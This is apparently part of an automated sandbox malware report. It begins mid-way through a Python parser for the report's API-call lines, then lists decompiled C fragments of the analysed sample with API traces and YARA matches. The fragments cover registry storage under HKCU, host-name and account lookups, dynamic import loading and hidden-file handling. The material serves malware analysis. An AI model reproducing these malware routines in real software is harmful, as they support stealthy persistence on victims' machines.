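  • Part of subcall function 0040675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,761B43E0,00000000), ref: 004067B0
  • Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000002,?,761B43E0,00000000), ref: 004067BF
  • Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>[\w.]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")

# Documented Win32 values (winreg.h, winnt.h, fileapi.h).
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_RIGHTS = {0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x4: "KEY_CREATE_SUB_KEY",
              0x8: "KEY_ENUMERATE_SUB_KEYS", 0x10: "KEY_NOTIFY", 0x20: "KEY_CREATE_LINK",
              0x100: "KEY_WOW64_64KEY", 0x200: "KEY_WOW64_32KEY"}
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_ATTR = {0x1: "FILE_ATTRIBUTE_READONLY", 0x2: "FILE_ATTRIBUTE_HIDDEN",
             0x4: "FILE_ATTRIBUTE_SYSTEM", 0x10: "FILE_ATTRIBUTE_DIRECTORY",
             0x20: "FILE_ATTRIBUTE_ARCHIVE", 0x80: "FILE_ATTRIBUTE_NORMAL"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]   # None where the report printed '?' or a non-hex token
    ref: int                    # call-site address
    subcall: Optional[int]      # callee this line was attributed to, if any


def _arg(tok):
    try:
        return int(tok.strip(), 16)
    except ValueError:          # '?' and stray tokens such as '@
        return None


def parse_api_lines(text):
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:               # section headers, blank lines
            continue
        args = [_arg(t) for t in m.group("args").split(",")] if m.group("args") else []
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16), sub))
    return calls


def flags(value, table):
    """Render a bit mask as OR-ed names; unknown bits are kept as hex."""
    if value is None:
        return "?"
    names, rest = [], value
    for bit, name in table.items():
        if value & bit == bit:
            names.append(name)
            rest &= ~bit
    if rest or not names:
        names.append(hex(rest))
    return "|".join(names)


def enum(value, table):
    return "?" if value is None else table.get(value, hex(value))


def describe(call):
    """Decode the integer arguments whose meaning is fixed by the API prototype."""
    a = call.args + [None] * 8  # pad so positional lookups never IndexError
    if call.name.startswith("RegOpenKeyEx"):
        return f"{call.name}(hKey={enum(a[0], HIVES)}, samDesired={flags(a[3], KEY_RIGHTS)})"
    if call.name.startswith("CreateFile"):
        return (f"{call.name}(access={flags(a[1], GENERIC)}, share={flags(a[2], SHARE)}, "
                f"disposition={enum(a[4], DISPOSITION)}, attrs={flags(a[5], FILE_ATTR)})")
    if call.name.startswith("SetFileAttributes"):
        return f"{call.name}(attrs={flags(a[1], FILE_ATTR)})"
    return call.name + "(" + ", ".join("?" if v is None else hex(v) for v in call.args) + ")"


def by_function(calls):
    """Group lines by the function they were attributed to (None = the listed function)."""
    groups = {}
    for c in calls:
        groups.setdefault(c.subcall, []).append(c)
    return groups


if __name__ == "__main__":
    for func, group in by_function(parse_api_lines(SAMPLE)).items():
        print("direct calls" if func is None else f"subcall {func:08X}")
        for c in group:
            print(f"  {c.ref:08X}  {describe(c)}")
```

Run as-is, it prints the sample split into the function's own calls and those attributed to subcalls 0040675C and 0040EC2E. Two points are worth noticing in the output. The RegOpenKeyExA line decodes only hKey=HKEY_CURRENT_USER, because the captured words after it do not line up with the prototype; the 0x101 access mask (KEY_QUERY_VALUE|KEY_WOW64_64KEY) is visible only in the decompiled call, so decoded trace values should always be cross-checked against the decompilation. In subcall 0040675C the sequence reads SetFileAttributesA(FILE_ATTRIBUTE_NORMAL), CreateFileA(GENERIC_READ, OPEN_EXISTING), a second CreateFileA with FILE_ATTRIBUTE_SYSTEM, then SetFileAttributesA(FILE_ATTRIBUTE_HIDDEN): the file it reads is set to normal for the open and put back to hidden afterwards.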

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                  • String ID: 0$9
                                                                                                                                  • API String ID: 3120068967-1975997740
                                                                                                                                  • Opcode ID: 691507e34d7afe4ea86414c9a6e42aae493159cc18c1754af5f3c9dc0af58606
                                                                                                                                  • Instruction ID: 088c3d47d8d0274aa8753d7ba779fbf6fe5e7d9133052a4499599c1af462acad
                                                                                                                                  • Opcode Fuzzy Hash: 691507e34d7afe4ea86414c9a6e42aae493159cc18c1754af5f3c9dc0af58606
                                                                                                                                  • Instruction Fuzzy Hash: D341F4B1E05229DFEB24CF58D889BAEB7B5BB84304F6481DAD049A7240C7789E85CF45
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                  • String ID: '$9
                                                                                                                                  • API String ID: 3120068967-1823400153
                                                                                                                                  • Opcode ID: 77454f3ef24fc6127ea5a9b42341be1eb876f1449da21b787ef907bebcdd289a
                                                                                                                                  • Instruction ID: 1c52575e259da486ba6c398081418c2db578d6301d08719f2cdf30cb48880645
                                                                                                                                  • Opcode Fuzzy Hash: 77454f3ef24fc6127ea5a9b42341be1eb876f1449da21b787ef907bebcdd289a
                                                                                                                                  • Instruction Fuzzy Hash: 1D4116F1E001299FDB64CF49D841BAEB7B5FF85314F40459AD188AB241C7785E81CF5A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040E095(void* _a4, char* _a8, intOrPtr* _a12, char* _a16, int _a20) {
                                                                                                                                  				int _v8;
                                                                                                                                  				char* _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				char _v48;
                                                                                                                                  				intOrPtr* _t34;
                                                                                                                                  				int _t50;
                                                                                                                                  				void* _t52;
                                                                                                                                  				intOrPtr _t53;
                                                                                                                                  				int _t57;
                                                                                                                                  				int _t58;
                                                                                                                                  				void* _t59;
                                                                                                                                  				void* _t60;
                                                                                                                                  				void* _t61;
                                                                                                                                  
                                                                                                                                  				_t57 = 0;
                                                                                                                                  				if(RegCreateKeyExA(_a4, _a8, 0, 0, 0, 0x20106, 0,  &_v16, 0) != 0) {
                                                                                                                                  					return 0;
                                                                                                                                  				}
                                                                                                                                  				_v12 = _a16;
                                                                                                                                  				_t34 = _a12;
                                                                                                                                  				_t52 = _t34 + 1;
                                                                                                                                  				do {
                                                                                                                                  					_t53 =  *_t34;
                                                                                                                                  					_t34 = _t34 + 1;
                                                                                                                                  				} while (_t53 != 0);
                                                                                                                                  				_t55 = _t34 - _t52;
                                                                                                                                  				_v8 = 0;
                                                                                                                                  				if(_t34 - _t52 > 0x1c) {
                                                                                                                                  					_t55 = 0x1c;
                                                                                                                                  				}
                                                                                                                                  				E0040EE08( &_v48, _a12, _t55);
                                                                                                                                  				_t50 = _a20;
                                                                                                                                  				_t61 = _t60 + 0xc;
                                                                                                                                  				if(_t50 <= _t57) {
                                                                                                                                  					L11:
                                                                                                                                  					E0040F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
                                                                                                                                  					RegDeleteValueA(_v16,  &_v48);
                                                                                                                                  					RegCloseKey(_v16);
                                                                                                                                  					return 0 | _t50 == _t57;
                                                                                                                                  				} else {
                                                                                                                                  					while(1) {
                                                                                                                                  						_t58 = 0xff000;
                                                                                                                                  						if(_t50 < 0xff000) {
                                                                                                                                  							_t58 = _t50;
                                                                                                                                  						}
                                                                                                                                  						E0040F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
                                                                                                                                  						_t61 = _t61 + 0xc;
                                                                                                                                  						if(RegSetValueExA(_v16,  &_v48, 0, 3, _v12, _t58) != 0) {
                                                                                                                                  							break;
                                                                                                                                  						}
                                                                                                                                  						_v12 =  &(_v12[_t58]);
                                                                                                                                  						_t50 = _t50 - _t58;
                                                                                                                                  						_v8 = _v8 + 1;
                                                                                                                                  						if(_t50 > 0) {
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					_t57 = 0;
                                                                                                                                  					goto L11;
                                                                                                                                  				}
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • RegCreateKeyExA.ADVAPI32(80000001,0040E2A3,00000000,00000000,00000000,00020106,00000000,0040E2A3,00000000,000000E4), ref: 0040E0B2
                                                                                                                                  • RegSetValueExA.ADVAPI32(0040E2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E127
                                                                                                                                  • RegDeleteValueA.ADVAPI32(0040E2A3,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E158
                                                                                                                                  • RegCloseKey.ADVAPI32(0040E2A3,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,0040E2A3), ref: 0040E161
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value$CloseCreateDelete
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 2667537340-2980165447
                                                                                                                                  • Opcode ID: 638dec105df7dcb1f365d34fe073c8f8fa39a9ad738abc938cf50ffa02a2619f
                                                                                                                                  • Instruction ID: af4a942e7328ea1ce2cdf979f73f75556816175b5134196b99f0fb832a21e1c2
                                                                                                                                  • Opcode Fuzzy Hash: 638dec105df7dcb1f365d34fe073c8f8fa39a9ad738abc938cf50ffa02a2619f
                                                                                                                                  • Instruction Fuzzy Hash: 2F218071A00219BBDF209FA6EC89EDF7F79EF08754F008072F904A6190E6718A64DB94
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RegCreateKeyExA.ADVAPI32(80000001,00ADE50A,00000000,00000000,00000000,00020106,00000000,00ADE50A,00000000,000000E4), ref: 00ADE319
                                                                                                                                  • RegSetValueExA.ADVAPI32(00ADE50A,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 00ADE38E
                                                                                                                                  • RegDeleteValueA.ADVAPI32(00ADE50A,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 00ADE3BF
                                                                                                                                  • RegCloseKey.ADVAPI32(00ADE50A,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,00ADE50A), ref: 00ADE3C8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value$CloseCreateDelete
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 2667537340-2980165447
                                                                                                                                  • Opcode ID: 71be46fcf4b4c1b855c56a8beb8c548cd5d416d4e28516e03566d8543fb954ad
                                                                                                                                  • Instruction ID: c57011f554f42c4504bdd26d87baf466d730c7b0aa5616c916e57e93d0f59832
                                                                                                                                  • Opcode Fuzzy Hash: 71be46fcf4b4c1b855c56a8beb8c548cd5d416d4e28516e03566d8543fb954ad
                                                                                                                                  • Instruction Fuzzy Hash: E6214F71A0021DABDF20AFA4EC85EEF7F79EF08750F008022F906EA251E2718A54D790
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetUserNameA.ADVAPI32(?,?), ref: 00AD71E1
                                                                                                                                  • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00AD7228
                                                                                                                                  • LocalFree.KERNEL32(?,?,?), ref: 00AD7286
                                                                                                                                  • wsprintfA.USER32 ref: 00AD729D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Name$AccountFreeLocalLookupUserwsprintf
                                                                                                                                  • String ID: |
                                                                                                                                  • API String ID: 2539190677-2343686810
                                                                                                                                  • Opcode ID: 0c0665c49b02975d3cb655efb4674a53369201e8279effc4896e63a6fe97e42a
                                                                                                                                  • Instruction ID: 76bfb908aec0685af7d998ee72afa197105f7d011f7a41e578624e33579b6ebd
                                                                                                                                  • Opcode Fuzzy Hash: 0c0665c49b02975d3cb655efb4674a53369201e8279effc4896e63a6fe97e42a
                                                                                                                                  • Instruction Fuzzy Hash: FC311A72904208BFDB01DFA8DD45ADE7BACEF04314F148166F95ADB201EA75DA488B94
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

C-Code - Quality: 100%
// Decompiled helper: copies the local host name into the caller's buffer,
// keeping only [A-Za-z0-9.] characters, checks for a trailing '.', and falls
// back to the literal "LocalHost" when gethostname fails or nothing remains.
			E0040AD08(CHAR* _a4) {
				char _v132;                 // 0x80-byte stack buffer passed to gethostname
				int _t9;
				char _t11;
				intOrPtr* _t12;
				CHAR* _t13;
				CHAR* _t14;

				_t9 = gethostname( &_v132, 0x80);
				if(_t9 != 0) {
					// gethostname failed (non-zero return): skip the filtering step
					_t14 = _a4;
					L15:
					if( *_t14 != 0) {
						return _t9;
					}
					// empty result: substitute the fixed name "LocalHost"
					return lstrcpyA(_t14, "LocalHost");
				}
				_t13 = _a4;                 // write cursor into the output buffer
				_t11 = _v132;               // current input character
				_t12 =  &_v132;             // read cursor over the raw host name
				_t14 = _t13;                // start of the output buffer
				while(_t11 != 0) {
					if(_t11 < 0x61 || _t11 > 0x7a) {            // not 'a'..'z'
						if(_t11 < 0x41 || _t11 > 0x5a) {        // not 'A'..'Z'
							if(_t11 < 0x30 || _t11 > 0x39) {    // not '0'..'9'
								if(_t11 != 0x2e) {              // not '.'
									goto L10;                   // drop this character
								}
							}
						}
						goto L9;
					} else {
						L9:
						 *_t13 = _t11;                          // keep this character
						_t13 =  &(_t13[1]);
						L10:
						_t12 = _t12 + 1;
						_t11 =  *_t12;
						continue;
					}
				}
				_t9 = lstrlenA(_t14);
				// trailing-'.' check; as decompiled, the index is the string length,
				// i.e. the position of the terminating NUL byte
				if(_t14[_t9] == 0x2e) {
					_t9 = lstrlenA(_t14);
					_t14[_t9] = 0;
				}
				goto L15;
			}

                                                                                                                                  APIs
                                                                                                                                  • gethostname.WS2_32(?,00000080), ref: 0040AD1C
                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040AD60
                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040AD69
                                                                                                                                  • lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$gethostnamelstrcpy
                                                                                                                                  • String ID: LocalHost
                                                                                                                                  • API String ID: 3695455745-3154191806
                                                                                                                                  • Opcode ID: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
                                                                                                                                  • Instruction ID: 5e983dddb47fd7e780230f110e9d304ee880480ae48faa8370a3fb9af9ed59c3
                                                                                                                                  • Opcode Fuzzy Hash: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
                                                                                                                                  • Instruction Fuzzy Hash: FA0149208443895EDF3107289844BEA3F675F9670AF104077E4C0BB692E77C8893835F
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 00ADB51A
                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00ADB529
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00ADB548
                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?), ref: 00ADB590
                                                                                                                                  • wsprintfA.USER32 ref: 00ADB61E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$File$Local$InformationSystemZonewsprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4026320513-0
                                                                                                                                  • Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                                                                  • Instruction ID: 1855999ddded257e6d5b8e73e04ca7eb728408bb2abd33832ca59549e2f801fd
                                                                                                                                  • Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                                                                  • Instruction Fuzzy Hash: B5510071D0021CEACF14DFD5D8495EEBBB9BF48304F11816BE506A6250E7B84AC9CFA8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 00AD6303
                                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00AD632A
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00AD63B1
                                                                                                                                  • IsBadHugeReadPtr.KERNEL32(-000000DC,00000014), ref: 00AD6405
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HugeRead$AddressLibraryLoadProc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3498078134-0
                                                                                                                                  • Opcode ID: 22151fd6ac6a99dd14e45186f4812a7dac7af9c00bb3bb0eb99ee7530713bb62
                                                                                                                                  • Instruction ID: a83fa53bbcd5e05171866a1d26571dd0bcd7e04f98affada62f738d67636ffc8
                                                                                                                                  • Opcode Fuzzy Hash: 22151fd6ac6a99dd14e45186f4812a7dac7af9c00bb3bb0eb99ee7530713bb62
                                                                                                                                  • Instruction Fuzzy Hash: 09414AB1A00209EFDB14CF58C984BA9B7B8FF14354F28816AE816DB390E775ED41CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __un_inc$__inc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 715532115-0
                                                                                                                                  • Opcode ID: e649c02e62a12101f2747fd93684baa404b5747cfbd2d49534dae470f0e9af3a
                                                                                                                                  • Instruction ID: f942b1f4a04b6f0f9e0d70a22d6cc7c0db211ee0f9e66cba493c5219ac1b7685
                                                                                                                                  • Opcode Fuzzy Hash: e649c02e62a12101f2747fd93684baa404b5747cfbd2d49534dae470f0e9af3a
                                                                                                                                  • Instruction Fuzzy Hash: 55418FB4E00518DFCF14DF69D8955EDB771AF84314F20C29BE82A9B381D639AA80CF58
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

C-Code - Quality: 62%
// Decompiled (partial; the listing is truncated in the report). Walks a
// structure at __esi whose three 16-bit fields at +6, +8 and +0xa are summed
// into _v20, calling the helpers E00402816, E00402871 and E0040EE2A, which are
// not shown here. _t76 is used without a declaration (decompiler artifact).
			E00402923(void* __ecx, void* __esi, intOrPtr _a4) {
				signed int* _v8;
				signed int* _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed short _v28;
				short _v30;
				short _v32;
				char _v292;
				char _v296;
				void* __ebx;
				void* __edi;
				void* _t37;
				intOrPtr _t41;
				signed int* _t42;
				signed short _t53;
				signed int** _t62;
				void* _t67;
				void* _t70;
				intOrPtr _t71;
				intOrPtr* _t79;
				signed int* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				_t81 = __esi;
				_t37 = 0xc;
				_v8 = 0;
				_v16 = 0;
				if(_a4 >= _t37) {                       // minimum size check: _a4 >= 12
					_t67 = E00402816(_t37, __esi, __ecx, __esi, _a4);
					if(_t67 < _a4) {
						_t76 =  *(__esi + 6) & 0x0000ffff;
						_t41 = ( *(__esi + 0xa) & 0x0000ffff) + ( *(__esi + 8) & 0x0000ffff) + ( *(__esi + 6) & 0x0000ffff);
						_v20 = _t41;
						_v12 = 0;
						if(_t41 <= 0) {
							L13:
							_t42 = _v16;
							L14:
							return _t42;
						}
						while(_t67 < _a4) {
							E0040EE2A(_t76,  &_v296, 0, 0x114);   // clears a 0x114-byte local (memset-like helper)
							_t70 = E00402871(_t67, _t81, _t76,  &_v292, _a4);
							_t15 = _t70 + 0xa; // 0xa
							_t83 = _t82 + 0x10;
							if(_t15 >= _a4) {               // bounds check against _a4 before continuing
								goto L13;
                                                                                                                                  							}
                                                                                                                                  							_t79 = __imp__#15;
                                                                                                                                  							_v32 =  *_t79( *(_t70 + _t81) & 0x0000ffff);
                                                                                                                                  							_v30 =  *_t79( *(_t70 + _t81 + 2) & 0x0000ffff);
                                                                                                                                  							_t53 =  *_t79( *(_t70 + _t81 + 8) & 0x0000ffff);
                                                                                                                                  							_v28 = _t53;
                                                                                                                                  							_t71 = _t70 + 0xa;
                                                                                                                                  							_v24 = _t71;
                                                                                                                                  							if((_t53 & 0x0000ffff) + _t71 > _a4) {
                                                                                                                                  								goto L13;
                                                                                                                                  							}
                                                                                                                                  							_t80 = HeapAlloc(GetProcessHeap(), 0, 0x124);
                                                                                                                                  							if(_t80 == 0) {
                                                                                                                                  								goto L13;
                                                                                                                                  							}
                                                                                                                                  							E0040EE2A(_t76, _t80, 0, 0x124);
                                                                                                                                  							E0040EE08(_t80,  &_v296, 0x114);
                                                                                                                                  							 *_t80 =  *_t80 & 0x00000000;
                                                                                                                                  							_t67 = _t71 + (_v28 & 0x0000ffff);
                                                                                                                                  							_t62 = _v8;
                                                                                                                                  							_t82 = _t83 + 0x18;
                                                                                                                                  							_v8 = _t80;
                                                                                                                                  							if(_t62 != 0) {
                                                                                                                                  								 *_t62 = _t80;
                                                                                                                                  							} else {
                                                                                                                                  								_v16 = _t80;
                                                                                                                                  							}
                                                                                                                                  							_v12 = _v12 + 1;
                                                                                                                                  							if(_v12 < _v20) {
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  								goto L13;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						goto L13;
                                                                                                                                  					}
                                                                                                                                  					_t42 = 0;
                                                                                                                                  					goto L14;
                                                                                                                                  				}
                                                                                                                                  				return 0;
                                                                                                                                  			}

Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Similarity
• Opcode ID: 762ec8260f02deadf6d9e217c9def93c366307fd2496715c07d4077f743f5322
• Instruction ID: 0bfd2bf0caf83722c61519a9099cbfb16c0865a6a5fe5c2769a2057d5fd36f2a
• Opcode Fuzzy Hash: 762ec8260f02deadf6d9e217c9def93c366307fd2496715c07d4077f743f5322
• Instruction Fuzzy Hash: 2931A471A00219ABCB109FA6CD85ABEB7F4FF48705F10846BF504F62C1E7B8D6418B68
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040E654(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
                                                                                                                                  				intOrPtr _t30;
                                                                                                                                  				CHAR* _t31;
                                                                                                                                  				int _t34;
                                                                                                                                  				intOrPtr* _t41;
                                                                                                                                  				intOrPtr* _t42;
                                                                                                                                  				void* _t47;
                                                                                                                                  				intOrPtr _t51;
                                                                                                                                  				int _t52;
                                                                                                                                  				void* _t53;
                                                                                                                                  				intOrPtr _t54;
                                                                                                                                  				void* _t55;
                                                                                                                                  				char _t59;
                                                                                                                                  
                                                                                                                                  				E0040DD05();
                                                                                                                                  				_t41 = 0x4120e8;
                                                                                                                                  				_t55 =  *0x4120e8 - 0x4120e8; // 0x4120e8
                                                                                                                                  				if(_t55 == 0) {
                                                                                                                                  					L9:
                                                                                                                                  					_t53 = E0040EBCC(0x1c);
                                                                                                                                  					if(_t53 != 0) {
                                                                                                                                  						 *((intOrPtr*)(_t53 + 0x18)) = _a4;
                                                                                                                                  						 *((intOrPtr*)(_t53 + 4)) = _a8;
                                                                                                                                  						E00403E8F(0x4120e8, _t53);
                                                                                                                                  						__eflags = _a12;
                                                                                                                                  						if(_a12 == 0) {
                                                                                                                                  							 *(_t53 + 8) = 0;
                                                                                                                                  						} else {
                                                                                                                                  							_t15 = _t53 + 8; // 0x8
                                                                                                                                  							lstrcpynA(_t15, _a12, 0xf);
                                                                                                                                  							 *((char*)(_t53 + 0x17)) = 0;
                                                                                                                                  						}
                                                                                                                                  						L15:
                                                                                                                                  						_t42 = 0x4120e4;
                                                                                                                                  						__eflags =  *0x4120e4 - _t42; // 0x4120e4
                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                  							L22:
                                                                                                                                  							_t47 = 1;
                                                                                                                                  							L11:
                                                                                                                                  							E0040DD69();
                                                                                                                                  							return _t47;
                                                                                                                                  						} else {
                                                                                                                                  							goto L16;
                                                                                                                                  						}
                                                                                                                                  						do {
                                                                                                                                  							L16:
                                                                                                                                  							_t30 =  *((intOrPtr*)(_t53 + 4));
                                                                                                                                  							_t51 =  *_t42;
                                                                                                                                  							__eflags = _t30 - 0xffffffff;
                                                                                                                                  							if(_t30 == 0xffffffff) {
                                                                                                                                  								L18:
                                                                                                                                  								_t20 = _t53 + 8; // 0x8
                                                                                                                                  								_t31 = _t20;
                                                                                                                                  								__eflags =  *_t31;
                                                                                                                                  								if( *_t31 == 0) {
                                                                                                                                  									L20:
                                                                                                                                  									_t52 = _t51 + 0xc;
                                                                                                                                  									__eflags = _t52;
                                                                                                                                  									 *((intOrPtr*)(_t53 + 0x18))(_t52, 1);
                                                                                                                                  									goto L21;
                                                                                                                                  								}
                                                                                                                                  								_t34 = lstrcmpA(_t51 + 0x10, _t31);
                                                                                                                                  								__eflags = _t34;
                                                                                                                                  								if(_t34 != 0) {
                                                                                                                                  									goto L21;
                                                                                                                                  								}
                                                                                                                                  								goto L20;
                                                                                                                                  							}
